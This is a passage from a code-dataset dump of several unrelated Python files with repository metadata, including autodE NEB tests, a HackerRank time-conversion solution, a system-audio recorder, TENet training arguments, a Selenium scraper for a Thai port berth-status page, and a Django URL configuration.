work_in_tmp_dir\nfrom autode.methods import XTB, ORCA\nfrom . import testutils\n\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\n\n@work_in_tmp_dir()\ndef test_neb_properties():\n # H-H H\n reac = Species(\n name=\"reac\",\n charge=0,\n mult=2,\n atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.0)],\n )\n # H H-H\n prod = Species(\n name=\"prod\",\n charge=0,\n mult=2,\n atoms=[Atom(\"H\"), Atom(\"H\", x=1.3), Atom(\"H\", x=2.0)],\n )\n\n neb = NEB.from_end_points(reac, prod, num=3)\n assert len(neb.images) == 3\n assert neb.peak_species is None\n assert not neb.images.contains_peak\n\n # Should move monotonically from 0.7 -> 1.3 Angstroms\n for i in range(1, len(neb.images)):\n prev_bb_dist = neb.images[i - 1].distance(0, 1)\n curr_bb_dist = neb.images[i].distance(0, 1)\n\n assert curr_bb_dist > prev_bb_dist\n\n\ndef test_image_properties():\n k = ForceConstant(0.1)\n images = CImages(images=Images(init_k=k))\n assert images != 0\n assert images == images\n\n images = Images(init_k=k)\n assert images != 0\n assert images == images\n\n image = Image(Molecule(smiles=\"CC\"), k=ForceConstant(1.0), name=\"tmp\")\n with pytest.raises(Exception):\n image._generate_conformers()\n\n\ndef test_contains_peak():\n species_list = Path()\n for i in range(5):\n h2 = Species(\n name=\"h2\", charge=0, mult=2, atoms=[Atom(\"H\"), Atom(\"H\", x=0)]\n )\n\n h2.energy = i\n species_list.append(h2)\n\n assert not species_list.contains_peak\n\n species_list[2].energy = 5\n assert species_list.contains_peak\n\n species_list[2].energies.clear()\n species_list[2].energy = None\n assert not species_list.contains_peak\n\n\n@testutils.requires_working_xtb_install\n@testutils.work_in_zipped_dir(os.path.join(here, \"data\", \"neb.zip\"))\ndef test_full_calc_with_xtb():\n sn2_neb = NEB.from_end_points(\n initial=Species(\n name=\"inital\",\n charge=-1,\n mult=1,\n atoms=xyz_file_to_atoms(\"sn2_init.xyz\"),\n solvent_name=\"water\",\n ),\n final=Species(\n name=\"final\",\n charge=-1,\n mult=1,\n atoms=xyz_file_to_atoms(\"sn2_final.xyz\"),\n solvent_name=\"water\",\n ),\n num=14,\n )\n\n sn2_neb.calculate(method=XTB(), n_cores=2)\n\n # There should be a peak in this surface\n assert sn2_neb.peak_species is not None\n\n assert all(image.energy is not None for image in sn2_neb.images)\n\n energies = [image.energy for image in sn2_neb.images]\n path_energy = sum(energy - min(energies) for energy in energies)\n\n assert 
0.25 < path_energy < 0.45\n\n\n@testutils.requires_working_xtb_install\n@testutils.work_in_zipped_dir(os.path.join(here, \"data\", \"neb.zip\"))\ndef test_get_ts_guess_neb():\n reactant = Reactant(\n name=\"inital\",\n charge=-1,\n mult=1,\n solvent_name=\"water\",\n atoms=xyz_file_to_atoms(\"sn2_init.xyz\"),\n )\n\n product = Reactant(\n name=\"final\",\n charge=-1,\n mult=1,\n solvent_name=\"water\",\n atoms=xyz_file_to_atoms(\"sn2_final.xyz\"),\n )\n\n xtb = XTB()\n xtb.path = shutil.which(\"xtb\")\n\n ts_guess = get_ts_guess_neb(reactant, product, method=xtb, n=10)\n\n assert ts_guess is not None\n # Approximate distances at the TS guess\n assert 1.8 < ts_guess.distance(0, 2) < 2.3 # C-F\n assert 2.1 < ts_guess.distance(2, 1) < 2.6 # C-Cl\n\n if os.path.exists(\"NEB\"):\n shutil.rmtree(\"NEB\")\n\n if os.path.exists(\"neb.xyz\"):\n os.remove(\"neb.xyz\")\n\n # Trying to get a TS guess with an unavailable method should return None\n # as a TS guess\n orca = ORCA()\n orca.path = None\n\n orca_ts_guess = get_ts_guess_neb(reactant, product, method=orca, n=10)\n assert orca_ts_guess is None\n\n\ndef test_climbing_image():\n k = ForceConstant(0.1)\n images = CImages(images=Images(init_k=k))\n images.append_species(Molecule(atoms=[Atom(\"H\")], mult=2))\n\n assert images.peak_idx is None\n assert images[0].iteration == 0\n images[0].iteration = 10\n\n\ndef _simple_h2_images(num, shift, increment):\n \"\"\"Simple set of images for a n-image NEB for H2\"\"\"\n\n images = Images(init_k=ForceConstant(1.0))\n\n for i in range(num):\n mol = Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=shift + i * increment)])\n images.append_species(mol)\n\n return images\n\n\ndef test_energy_gradient_type():\n k = ForceConstant(1.0)\n image = Image(species=Molecule(atoms=[Atom(\"H\")], mult=2), name=\"tmp\", k=k)\n\n # Energy and gradient must have a method (EST or IDPP)\n with pytest.raises(ValueError):\n _ = energy_gradient(image=image, method=None, n_cores=1)\n\n\ndef test_iddp_init():\n \"\"\"IDPP requires at least 2 images\"\"\"\n\n k = ForceConstant(0.1)\n\n with pytest.raises(ValueError):\n _ = IDPP(Images(init_k=k))\n\n with pytest.raises(ValueError):\n _ = IDPP(Images(init_k=k))\n\n\ndef test_iddp_energy():\n images = _simple_h2_images(num=3, shift=0.5, increment=0.1)\n idpp = IDPP(images)\n\n # Should be callable to evaluate the objective function\n value = idpp(images[1])\n\n assert value is not None\n assert np.isclose(\n value,\n # w r_k r\n 0.6 ** (-4) * ((0.5 + 2 * 0.2 / 3) - 0.6) ** 2,\n atol=1e-5,\n )\n\n\ndef test_iddp_gradient():\n images = _simple_h2_images(num=3, shift=0.5, increment=0.1)\n image = images[1]\n idpp = IDPP(images)\n\n value = idpp(image)\n\n # and the gradient calculable\n grad = idpp.grad(image).flatten()\n assert grad is not None\n\n # And the gradient be close to the numerical analogue\n def num_grad(n, h=1e-8):\n i, k = n // 3, n % 3\n\n shift_vec = np.zeros(3)\n shift_vec[k] = h\n\n image.atoms[i].translate(shift_vec)\n new_value = idpp(image)\n image.atoms[i].translate(-shift_vec)\n\n return (new_value - value) / h\n\n # Numerical gradient should be finite\n assert not np.isclose(num_grad(0), 0.0, atol=1e-10)\n\n # Check all the elements in the gradient vector\n for i, analytic_value in enumerate(grad):\n assert np.isclose(analytic_value, num_grad(i), atol=1e-5)\n\n\n@work_in_tmp_dir()\ndef test_neb_interpolate_and_idpp_relax():\n mol = Molecule(\n name=\"methane\",\n atoms=[\n Atom(\"C\", -0.91668, 0.42765, 0.00000),\n Atom(\"H\", 0.15332, 0.42765, 0.00000),\n Atom(\"H\", 
-1.27334, 0.01569, -0.92086),\n Atom(\"H\", -1.27334, 1.43112, 0.10366),\n Atom(\"H\", -1.27334, -0.16385, 0.81720),\n ],\n )\n\n rot_mol = mol.copy()\n rot_mol.rotate(axis=[1.0, 0.0, 0.0], theta=1.5)\n\n neb = NEB.from_end_points(initial=mol, final=rot_mol, num=10)\n\n for image in neb.images:\n assert are_coords_reasonable(image.coordinates)\n\n\ndef test_max_delta_between_images():\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=1.7)]),\n ]\n\n assert np.isclose(\n NEB.from_list(_list).max_atom_distance_between_images, 1.0\n )\n\n _list[0].atoms[1].coord[0] = 1.7 # x coordinate of the second atom\n assert np.isclose(\n NEB.from_list(_list).max_atom_distance_between_images, 0.0\n )\n\n\ndef test_max_delta_between_images_h3():\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.70657), Atom(\"H\", x=2.7)]),\n ]\n\n neb = NEB.from_list(_list)\n assert np.isclose(neb.max_atom_distance_between_images, 0.00657)\n\n assert np.isclose(\n neb.max_atom_distance_between_images,\n neb._max_atom_distance_between_images([0, 1]),\n )\n\n\ndef test_partition_max_delta():\n # Set of molecules that are like: [H-H...H, H--H--H, H...H-H]\n _list = [\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=0.7), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=1.35), Atom(\"H\", x=2.7)]),\n Molecule(atoms=[Atom(\"H\"), Atom(\"H\", x=2.0), Atom(\"H\", x=2.7)]),\n ]\n\n h2_h = NEB.from_list(_list)\n max_delta = Distance(0.1, units=\"Å\")\n\n assert (\n np.max(\n np.linalg.norm(_list[0].coordinates - _list[1].coordinates, axis=1)\n )\n > max_delta\n )\n\n h2_h.partition(max_delta=max_delta)\n\n for i, j in [(0, 1), (1, 2)]:\n assert (\n np.max(\n np.linalg.norm(\n h2_h.images[i].coordinates - h2_h.images[j].coordinates,\n axis=1,\n )\n )\n <= max_delta\n )\n\n\ndef _h_xyz_string_with_energy(energy: float):\n return f\"1\\nE = {energy:.6f}\\nH 0.0 0.0 0.0\"\n\n\ndef _h_xyz_string():\n return f\"1\\ntitle line\\nH 0.0 0.0 0.0\"\n\n\n@work_in_tmp_dir()\ndef test_init_from_file_sets_force_constant():\n with open(\"tmp.xyz\", \"w\") as file:\n print(\n _h_xyz_string_with_energy(0.1),\n _h_xyz_string_with_energy(0.1015),\n _h_xyz_string_with_energy(0.105),\n sep=\"\\n\",\n file=file,\n )\n\n # Should be able to set the initial force constant\n neb = NEB.from_file(\"tmp.xyz\", init_k=0.234)\n assert len(neb.images) == 3\n assert np.isclose(neb.init_k, 0.234)\n\n neb = NEB.from_file(\"tmp.xyz\")\n # Estimated value should be reasonable\n k_1kcal_diffs = neb.init_k\n assert 0.001 < neb.init_k < 0.2\n\n with open(\"tmp.xyz\", \"w\") as file:\n print(\n _h_xyz_string_with_energy(0.1),\n _h_xyz_string_with_energy(0.25),\n _h_xyz_string_with_energy(0.4),\n sep=\"\\n\",\n file=file,\n )\n\n # with larger energy differences we should have a larger k\n assert NEB.from_file(\"tmp.xyz\").init_k > k_1kcal_diffs\n\n\n@work_in_tmp_dir()\ndef test_init_from_file_sets_force_constant_no_energies():\n with open(\"tmp.xyz\", \"w\") as file:\n print(_h_xyz_string(), _h_xyz_string(), sep=\"\\n\", file=file)\n\n neb = NEB.from_file(\"tmp.xyz\")\n # Estimated value should be reasonable even without energies\n assert 0.001 < neb.init_k < 0.2\n\n\ndef test_neb_constructor_with_kwargs_raises():\n with pytest.raises(Exception):\n _ = NEB(init_k=ForceConstant(0.1), another_arg=\"a string\")\n\n\ndef test_constructing_neb_from_endpoints_with_different_atoms_raises():\n with 
pytest.raises(Exception):\n        _ = NEB.from_end_points(\n            Molecule(smiles=\"O\"), Molecule(smiles=\"C\"), num=4\n        )\n\n\ndef test_neb_from_endpoints_requires_at_least_2_images():\n    with pytest.raises(Exception):\n        _ = NEB.from_end_points(\n            Molecule(smiles=r\"C\\C=C\\C\"), Molecule(smiles=r\"C\\C=C/C\"), num=1\n        )\n\n\n@testutils.requires_working_xtb_install\n@work_in_tmp_dir()\ndef test_neb_ts_guess_is_none_if_no_peak():\n    init = Molecule(smiles=\"C\")\n    final = init.copy()\n    final.rotate(axis=[0.1, 0.2, 0.3], theta=0.4)\n\n    result = get_ts_guess_neb(init, final, method=XTB(), n=3)\n    assert result is None\n","repo_name":"duartegroup/autodE","sub_path":"tests/test_neb.py","file_name":"test_neb.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"68"} +{"seq_id":"6922006674","text":"#https://www.hackerrank.com/challenges/time-conversion/problem\n\n#!/bin/python3\n\nimport os\nimport sys\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n    #\n    # Write your code here.\n    #\n    h=0\n    if s[-2]=='A' and s[0:2]=='12':\n        s='00'+s[2:]\n    if s[-2]=='P' and s[0:2]=='12':\n        return '12'+s[2:-2]\n    if s[-2]=='P':\n        h=int(s[0:2])+12\n        if h>=24:\n            h-=24\n            s='0'+str(h)+s[2:-2]\n        else:\n            s=str(h)+s[2:-2]\n    else:\n        s=s[0:-2]\n    return s\n    \n\nif __name__ == '__main__':\n    f = open(os.environ['OUTPUT_PATH'], 'w')\n\n    s = input()\n\n    result = timeConversion(s)\n\n    f.write(result + '\\n')\n\n    f.close()\n","repo_name":"cddedric/Hackerrank-solutions","sub_path":"Python/time_conversion.py","file_name":"time_conversion.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13966180494","text":"import pyaudio, wave, sys\r\n\r\ndef saveAudio(filename):\r\n    # all the basic information to get audio file\r\n    CHUNK = 1024\r\n    FORMAT = pyaudio.paInt16\r\n    CHANNELS = 1\r\n    RATE = 44100\r\n\r\n    # getting the audio from the speaker\r\n    p = pyaudio.PyAudio()\r\n    # default to device 1, but prefer the \"Stereo Mix\" loopback device when present\r\n    device_index = 1\r\n    for i in range(0, p.get_device_count()):\r\n        if \"Stereo Mix\" in p.get_device_info_by_index(i)['name']:\r\n            device_index = i\r\n            break\r\n\r\n    # opening the stream to start listening\r\n    stream = p.open(format = FORMAT,\r\n                    rate = RATE,\r\n                    input = True,\r\n                    channels = CHANNELS,\r\n                    frames_per_buffer=CHUNK,\r\n                    input_device_index=device_index)\r\n\r\n    all = []\r\n    print(\"recording!!!\")\r\n    beginning = True\r\n    # run while there is talking or there is silence\r\n    while True:\r\n\r\n        # read in data from the stream of stereo mix\r\n        data = stream.read(CHUNK)\r\n        all.append(data)\r\n        # print(\"data\", data[0], data[1], data[2], data[3])\r\n        \r\n        sample = [data[0], data[1], data[2], data[3]]\r\n        # check if there is talking or silence\r\n        if beginning == True and (255 in sample or 254 in sample or 1 in sample or [0, 0, 0, 0] == sample): \r\n            # print(\"continue\", sample)\r\n            continue\r\n        elif True in [True for point in sample if point > 1 and point < 254]: \r\n            # print(\"sound detected\", sample)\r\n            beginning = False\r\n        elif beginning == False and (255 in sample or 254 in sample or 1 in sample or [0, 0, 0, 0] == sample): \r\n            # print(\"end\", sample)\r\n            break\r\n\r\n    # no more talking so the file is done!\r\n    stream.stop_stream()\r\n    stream.close()\r\n    p.terminate()\r\n    print(\"finished!!!\")\r\n\r\n    # saving the file as a wav to pass onto getVoice\r\n    data = b''.join(all)\r\n    wf = wave.open(filename, 'wb')\r\n    wf.setnchannels(CHANNELS)\r\n    
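# paInt16 is 16-bit PCM, so p.get_sample_size(FORMAT) returns 2 bytes per sample\r\n    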
wf.setsampwidth(p.get_sample_size(FORMAT))\r\n wf.setframerate(RATE)\r\n wf.writeframes(data)\r\n wf.close()","repo_name":"KaiHoshijo/Zoombot","sub_path":"recordSounds.py","file_name":"recordSounds.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6323971196","text":"import os\nimport os.path as osp\nimport sys\nimport time\nimport logging\nimport pathlib\nimport uuid\nimport shutil\nimport torch\nimport random\nimport numpy as np\n\n\nclass BaseArgs:\n def __init__(self, parser):\n parser.add_argument('--phase', type=str, default='train',\n help='phase. Default: train')\n parser.add_argument('--seed', type=int, default=0)\n\n # datasets args\n parser.add_argument('--train_list', type=str, default='datasets/train_mirflickr.txt',\n help='path to train list')\n parser.add_argument('--val_list', type=str, default='datasets/val_mirflickr.txt',\n help='path to val list')\n parser.add_argument('--benchmark_path', type=str,\n default='data/benchmark/urban100/urban100_noisy_lr_raw-srgb.pt',\n help='path to val list')\n\n parser.add_argument('--patch_size', default=64, type=int,\n help='width and height for a patch (default: 256)')\n parser.add_argument('--in_channels', default=3, type=int,\n help='in_channels, RGB')\n parser.add_argument('--gt_channels', default=3, type=int,\n help='gt_channels, RGB')\n parser.add_argument('--in_type', type=str, default='noisy_lr_raw',\n help='the input image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n parser.add_argument('--mid_type', type=str, default='None',\n help='the mid output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb, None'\n )\n parser.add_argument('--out_type', type=str, default='linrgb',\n help='the output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n\n # noise\n # parser.add_argument('--denoise', action='store_true', help='denoise store_true, using shot and read noise')\n parser.add_argument('--read_noise', default=0.00, type=float, help='read_noise')\n parser.add_argument('--shot_noise', default=0.00, type=float, help='shot_noise')\n\n # train args\n parser.add_argument('--batch_per_gpu', default=16, type=int,\n help='batch size per GPU (default:16)')\n parser.add_argument('--n_gpus', default=1, type=int,\n help='number of GPUs (default:1)')\n parser.add_argument('--max_epochs', default=500, type=int,\n help='number of total epochs to run')\n parser.add_argument('--lr', default=1e-4, type=float,\n help='initial learning rate')\n parser.add_argument('--lr_decay_step', default=50, type=int,\n help='learning rate decay step')\n parser.add_argument('--gamma', default=0.5, type=float,\n help='learning rate decay gamma')\n\n # logger parse\n parser.add_argument('--root_dir', type=str, default='log',\n help='path for saving experiment files')\n parser.add_argument('--img_freq', default=10, type=int,\n help='show images every xxx epochs(default: 10)')\n parser.add_argument('--print_freq', default=100, type=int,\n help='show images every xxx iterations(default: 100)')\n # model args\n parser.add_argument('--model', default='tenet', type=str,\n help='path to pretrained model (default: tenet)')\n parser.add_argument('--norm', default=None, 
type=str,\n                            help='normalization_type(default: do not use BN or IN)')\n        parser.add_argument('--block', default='rrdb', type=str,\n                            help='dm_block(default: res). res/dudb/rrdb')\n        parser.add_argument('--act', default='relu', type=str,\n                            help='activation layer {relu, prelu, leakyrelu}')\n        parser.add_argument('--no_bias', action='store_false', dest='bias',\n                            help='do not use bias of layer')\n        parser.add_argument('--channels', default=64, type=int,\n                            help='channels')\n        parser.add_argument('--n_blocks', default=18, type=int,\n                            help='number of basic blocks')\n        parser.add_argument('--mid_out', action='store_true',\n                            help='activate middle output supervision')\n        parser.add_argument('--output_mid', action='store_true',\n                            help='output the middle stage result')\n\n        # for super-resolution\n        parser.add_argument('--scale', default=2, type=int,\n                            help='Scale of Super-resolution. Default: 2')\n        parser.add_argument('--downsampler', default='bic', type=str,\n                            help='downsampler of Super-resolution. Bicubic or average downsampling. bic / avg')\n        # loss args\n        parser.add_argument('--mid_lambda', type=float, default=1.0, help='lambda for the middle stage supervision')\n        parser.add_argument('--loss_on_srgb', action='store_true',\n                            help='calculate the loss function values on sRGB')\n\n        # test args\n        parser.add_argument('--save_dir', type=str, default=None,\n                            help='path to save the test result')\n        parser.add_argument('--test_data', type=str, default='/home/wangy0k/Desktop/denoise/darmstadt/data/',\n                            help='path to the test data (dnd dataset)')\n        parser.add_argument('--pretrain', default='', type=str,\n                            help='path to pretrained model(default: none)')\n        parser.add_argument('--intermediate', type=bool, default=False,\n                            help='ISP intermediate state')\n        parser.add_argument('--pre_in_type', type=str, default='noisy_lr_raw',\n                            help='the input image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n                                 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n                                 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n                            )\n        parser.add_argument('--pre_out_type', type=str, default='raw',\n                            help='the output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n                                 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n                                 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n                            )\n        parser.add_argument('--pre_model', default='tenet', type=str,\n                            help='path to pretrained model (default: tenet)')\n\n        args = parser.parse_args()\n\n        args.dataset = args.train_list.split('_')[-1].split('.')[0]\n        args.batch_size = args.batch_per_gpu * args.n_gpus\n\n        args.pre_jobname = '-'.join([args.pre_in_type, args.mid_type, args.pre_out_type])\n        args.jobname = '-'.join([args.in_type, args.mid_type, args.out_type])\n\n        args.mid_type = None if args.mid_type == 'None' else args.mid_type\n        self.args = args\n\n        # ===> generate log dir\n        self._generate_exp_directory()\n        if self.args.phase == 'train':\n            self._configure_logger()\n            self._print_args()\n        self.set_seed(self.args.seed)\n        self.args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    def _generate_exp_directory(self):\n        \"\"\"\n        Helper function to create checkpoint folder. 
We save\n        model checkpoints using the provided model directory\n        but we add a sub-folder for each separate experiment:\n        \"\"\"\n        timestamp = time.strftime('%Y%m%d-%H%M%S')\n\n        experiment_string = '_'.join([self.args.jobname, timestamp, str(uuid.uuid4())])\n\n        if self.args.phase == 'train':\n            self.args.exp_dir = osp.join(self.args.root_dir, experiment_string)\n            self.args.ckpt_dir = osp.join(self.args.exp_dir, \"checkpoint\")\n            self.args.code_dir = osp.join(self.args.exp_dir, \"code\")\n            self.args.res_dir = osp.join(self.args.exp_dir, \"result\")\n            pathlib.Path(self.args.exp_dir).mkdir(parents=True, exist_ok=True)\n            pathlib.Path(self.args.ckpt_dir).mkdir(parents=True, exist_ok=True)\n            pathlib.Path(self.args.res_dir).mkdir(parents=True, exist_ok=True)\n            # ===> save scripts\n            shutil.copytree('model', osp.join(self.args.code_dir, 'model'))\n            shutil.copytree('TorchTools', osp.join(self.args.code_dir, 'TorchTools'))\n        else:\n\n            if not self.args.save_dir:\n                self.args.save_dir = osp.dirname(self.args.pretrain)\n                # self.args.save_dir = osp.join(self.args.save_dir, \"result-{}\".format(osp.basename(self.args.pretrain)))\n            pathlib.Path(self.args.save_dir).mkdir(parents=True, exist_ok=True)\n\n    def _configure_logger(self):\n        \"\"\"\n        Configure logger on given level. Logging will occur on standard\n        output and in a log file saved in model_dir.\n        \"\"\"\n        self.args.loglevel = \"info\"\n        numeric_level = getattr(logging, self.args.loglevel.upper(), None)\n        if not isinstance(numeric_level, int):\n            raise ValueError('Invalid log level: {}'.format(self.args.loglevel))\n\n        log_format = logging.Formatter('%(asctime)s %(message)s')\n        logger = logging.getLogger()\n        logger.setLevel(numeric_level)\n\n        file_handler = logging.FileHandler(osp.join(self.args.exp_dir,\n                                                    '{}.log'.format(osp.basename(self.args.exp_dir))))\n        file_handler.setFormatter(log_format)\n        logger.addHandler(file_handler)\n\n        file_handler = logging.StreamHandler(sys.stdout)\n        file_handler.setFormatter(log_format)\n        logger.addHandler(file_handler)\n        logging.root = logger\n        logging.info(\"save log, checkpoint and code to: {}\".format(self.args.exp_dir))\n\n    def _print_args(self):\n        logging.info(\"========== args =============\")\n        for arg, content in self.args.__dict__.items():\n            logging.info(\"{}: {}\".format(arg, content))\n        logging.info(\"========== args END =============\")\n        logging.info(\"\\n\")\n        logging.info('===> Phase is {}.'.format(self.args.phase))\n\n    @staticmethod\n    def set_seed(seed=0):\n        random.seed(seed)\n        np.random.seed(seed)\n        torch.manual_seed(seed)\n        torch.cuda.manual_seed(seed)\n        torch.cuda.manual_seed_all(seed)\n        torch.backends.cudnn.deterministic = True\n        torch.backends.cudnn.benchmark = False\n","repo_name":"guochengqian/TENet","sub_path":"TorchTools/ArgsTools/pipe_args.py","file_name":"pipe_args.py","file_ext":"py","file_size_in_byte":11374,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"68"} +{"seq_id":"25415522645","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nimport mysql.connector\nimport csv\n\nurl = \"https://nsw.md.go.th/msberthmanagement/PublicBerthStatus.aspx\"\ndate_input = input('Put your input here, format dd/mm/yyyy: ').split('/')\ntable_name = f'{int(date_input[0])}, 
{int(date_input[1])}, {int(date_input[2])}'\n# date_input = '01/01/2023'.split('/')\n\nconvert_month = {1 : 'มกราคม',\n                 2 : 'กุมภาพันธ์',\n                 3 : 'มีนาคม',\n                 4 : 'เมษายน',\n                 5 : 'พฤษภาคม',\n                 6 : 'มิถุนายน',\n                 7 : 'กรกฎาคม ',\n                 8 : 'สิงหาคม',\n                 9 : 'กันยายน ',\n                 10 : 'เดือนตุลาคม',\n                 11 : 'พฤศจิกายน ',\n                 12 : 'ธันวาคม'}\n\ndef find_data_from_date(date_list):\n    \n    driver = webdriver.Chrome()\n    driver.get(url)\n    \n    try: \n        text_before = driver.find_element(By.XPATH, r\"/html/body/form/main/div/div/div/div/div/div/div[2]/div/div[1]/div/div[2]/div/div/div/div/table/tbody/tr[2]/td[6]/span[1]\").text\n    except NoSuchElementException: \n        text_before = \"\"\n\n    date_button = driver.find_element(By.XPATH, '/html/body/form/main/div/div/div/div/div/div/div[1]/div/div[3]/div/input')\n    date_button.click()\n    \n    wait = WebDriverWait(driver, 20)\n    \n    month_button = driver.find_element(By.XPATH, '/html/body/div/div[1]/div/div/select')\n    month_button.click()\n    \n    if date_list[1]:\n        date = int(date_list[0])\n        month = int(date_list[1])\n        year = int(date_list[2])\n        print(date, month, year)\n        \n        if month in range(1, 13):\n            select_month_button = driver.find_element(By.XPATH, f'/html/body/div/div[1]/div/div/select/option[{month}]')\n            select_month_button.click()\n            \n            if year:\n                select_year_button = driver.find_element(By.XPATH, f'/html/body/div/div[1]/div/div/div/input')\n                select_year_button.click()\n                select_year_button.send_keys(year)\n                \n                if date:\n                    date_Name = f'{convert_month[month]} {date}, {year}'\n                    date = wait.until(EC.element_to_be_clickable((By.XPATH,f\"(//span[@aria-label='{date_Name}'])\")))\n                    date.click()\n                    \n                    search = wait.until(EC.element_to_be_clickable((By.XPATH,'/html/body/form/main/div/div/div/div/div/div/div[1]/div/div[4]/div/a')))\n                    search.click()\n                    \n                else:\n                    print('Error date did not in put')\n                \n            else:\n                print('Error year did not in put')\n        \n        else:\n            print('Error month of range')\n        \n    i = 0  # poll counter: give up after 20 unchanged reads\n    while True:\n        try:\n            \n            current_text = driver.find_element(By.XPATH, r\"/html/body/form/main/div/div/div/div/div/div/div[2]/div/div[1]/div/div[2]/div/div/div/div/table/tbody/tr[2]/td[6]/span[1]\").text\n            if current_text != text_before:\n                break\n            \n            if i == 20:\n                break\n            # print(i)\n            i += 1\n            \n        except:\n            break\n    \n    all_data = driver.page_source\n    # print(all_data)\n    return all_data, date_Name\n\ndef get_data(all_data, date):\n    soup = BeautifulSoup(all_data, 'html.parser')\n    data = soup.find_all('div', {'class': 'col-lg-6'})\n    # print(data)\n    \n    port_list = []\n    ship_list = []\n    state_list = []\n\n    for ele in data:\n        head = ele.find_all('h6')\n        name = ele.select('[id*=\"lblShipName\"]')\n        state = ele.select('[id*=\"lblShipProcessingIndicator\"]')\n        # print(head)\n        for span in head:\n            port = span.find('span')\n            # print(port.string)\n            port_name = port.string \n            for n, s in zip(name, state):\n                # print(\" -\", n.string, \"(\"+ s.string + \")\")\n                # if port_name not in port_list:\n                #     port_list.append(port_name)\n                \n                # elif port_name in port_list:\n                #     port_list.append('')\n                port_list.append(port_name)\n                ship_list.append(n.string)\n                state_list.append(s.string)\n        # print(\"-------------------------------\")\n\n    \n    df = pd.DataFrame({'Port': port_list, 'Ship': ship_list, 'State': state_list})\n\n    # print(df.head)\n    df.to_excel(f'Collect_Data\{date}_data_table.xlsx', index=False)\n    df.to_csv(f'Collect_Data\{date}_data_table.csv', index=False)\n    \n    return port_list, ship_list, state_list\n\ndata, date = find_data_from_date(date_input)\nport_list, ship_list, state_list= get_data(data, 
date)","repo_name":"Pannmekmok/Port-Management-Weng","sub_path":"md-webscrap_dynamic.py","file_name":"md-webscrap_dynamic.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3128062828","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\ndef bfs():\n global queue\n while queue:\n z, y, x = queue.popleft()\n for i in range(6):\n nx, ny, nz = x + moveset[i][0], y + moveset[i][1], z + moveset[i][2]\n if nx < 0 or nx >= M or ny < 0 or ny >= N or nz < 0 or nz >= H:\n continue\n \n if box[nz][ny][nx] == 0:\n box[nz][ny][nx] = box[z][y][x] + 1\n queue.append((nz, ny, nx))\n\nM, N, H = map(int, input().split())\nbox = [[list(map(int, input().split())) for _ in range(N)] for _ in range(H)]\nmoveset = [(-1, 0, 0), (1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]\ndays = 0\nqueue = deque([])\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if box[i][j][k] == 1:\n queue.append((i, j, k))\n\nbfs()\n\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if box[i][j][k] == 0:\n print(-1)\n exit()\n if days < box[i][j][k]:\n days = box[i][j][k]\nprint(days - 1)","repo_name":"whatisyourname0/BOJ_Repository","sub_path":"archives/python/7569.py","file_name":"7569.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13898083205","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('debtors/', views.DebtorList.as_view(), name='debtors_list'),\n path('debtors//', views.debtors_detail, name='detail'),\n path('debtors/create/', views.DebtorCreate.as_view(), name='debtors_create'),\n path('debtors//update', views.DebtorUpdate.as_view(), name='debtors_update'),\n path('debtors//delete', views.DebtorDelete.as_view(), name='debtors_delete'),\n path('debtors//add_payment/', views.add_payment, name='add_payment'),\n path('debtors//assoc_insurance//', views.assoc_insurance, name='assoc_insurance'),\n path('insurance/', views.InsuranceList.as_view(), name='insurance_index'),\n path('insurance/create/', views.InsuranceCreate.as_view(), name='insurance_create'),\n path('insurance//delete/', views.InsuranceDelete.as_view(), 